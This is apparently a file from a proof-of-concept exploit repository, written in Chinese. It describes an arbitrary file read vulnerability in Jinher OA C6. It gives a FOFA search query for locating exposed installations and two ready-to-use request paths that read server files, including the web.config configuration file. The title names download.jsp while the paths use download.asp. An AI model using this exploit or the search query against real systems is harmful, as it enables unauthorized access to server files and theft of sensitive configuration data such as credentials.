POC/wpoc/金和OA/金和OA-C6-download.jsp任意文件读取漏洞.md
eeeeeeeeee-code 06c8413e64 first commit
2025-03-04 23:12:57 +08:00

476 B
Raw Blame History

金和OA-C6-download.jsp任意文件读取漏洞

金和OA C6 download.jsp文件存在任意文件读取漏洞攻击者通过漏洞可以获取服务器中的敏感信息

fofa

app="Jinher-OA"

poc

/C6/Jhsoft.Web.module/testbill/dj/download.asp?filename=download.asp
/C6/Jhsoft.Web.module/testbill/dj/download.asp?filename=/c6/web.config

image-20240609162635854